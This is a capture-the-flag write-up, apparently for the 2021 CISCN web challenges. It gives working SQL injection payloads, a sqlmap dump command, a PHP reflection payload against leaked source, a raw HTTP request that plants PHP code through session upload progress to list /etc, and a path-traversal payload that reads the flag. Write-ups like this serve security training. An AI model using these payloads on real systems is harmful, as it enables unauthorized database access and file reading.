WP - 2021ciscn
web
web1
union被绕过
uname=-7591') OR 1 GROUP BY CONCAT(0x7162627171,(SELECT (CASE WHEN (9596=9596) THEN 1 ELSE 0 END)),0x71786a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&passwd=123&Submit=%E7%99%BB%E5%BD%95
sqlmap可以直接跑出数据库名,
uname=admin') and (select from (select from flag as x join flag as y using(id,no)) as z)#&passwd=123&Submit=%E7%99%BB%E5%BD%95
python sqlmap.py -r 2.txt -D security -T flag -C 0c64d673-51d2-40e9-bb7d-11ff9d7961a7 --dump
easy_source
发现源码http://124.71.239.213:23133/.index.php.swo
<?php
class User
{
private static $c = 0;
function a()
{
return ++self::$c;
}
function b()
{
return ++self::$c;
}
function c()
{
return ++self::$c;
}
function d()
{
return ++self::$c;
}
function e()
{
return ++self::$c;
}
function f()
{
return ++self::$c;
}
function g()
{
return ++self::$c;
}
function h()
{
return ++self::$c;
}
function i()
{
return ++self::$c;
}
function j()
{
return ++self::$c;
}
function k()
{
return ++self::$c;
}
function l()
{
return ++self::$c;
}
function m()
{
return ++self::$c;
}
function n()
{
return ++self::$c;
}
function o()
{
return ++self::$c;
}
function p()
{
return ++self::$c;
}
function q()
{
return ++self::$c;
}
function r()
{
return ++self::$c;
}
function s()
{
return ++self::$c;
}
function t()
{
return ++self::$c;
}
}
$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);
var_dump($method->$rd());payload
?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment
middle_source
session 路径:
/var/lib/php/sessions/beeeejdcfb
考点是session文件包含,
首先看能否创建session文件,用phpinfo进行检验。
验证成功,尝试读路径
POST / HTTP/1.1
Host: 124.71.239.213:23204
Content-Length: 323
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWC3R56U8lDkCOsia
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fxxk123
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
------WebKitFormBoundaryWC3R56U8lDkCOsia
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
<?php
function searchDir($path,&$files){
if(is_dir($path)){
$opendir = opendir($path);
while ($file = readdir($opendir)){
if($file != '.' && $file != '..'){
searchDir($path.'/'.$file, $files);
}
}
closedir($opendir);
}
if(!is_dir($path)){
$files[] = $path;
}
}
function getDir($dir){
$files = array();
searchDir($dir, $files);
return $files;
}
$filenames = getDir('/etc');
foreach ($filenames as $value){
echo $value.'<br/>';
}
?>
------WebKitFormBoundaryWC3R56U8lDkCOsia
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryWC3R56U8lDkCOsia--遍历出了/etc下目录、子目录和文件。
保存到本地,稍微调整了格式,容易能看出来目标文件。
最后的payload:cf=../../../../../../../etc/ddgiebfdea/gdbcgdejhd/ddcecebice/aaajfjadah/aidfafgcaa/fl444444g
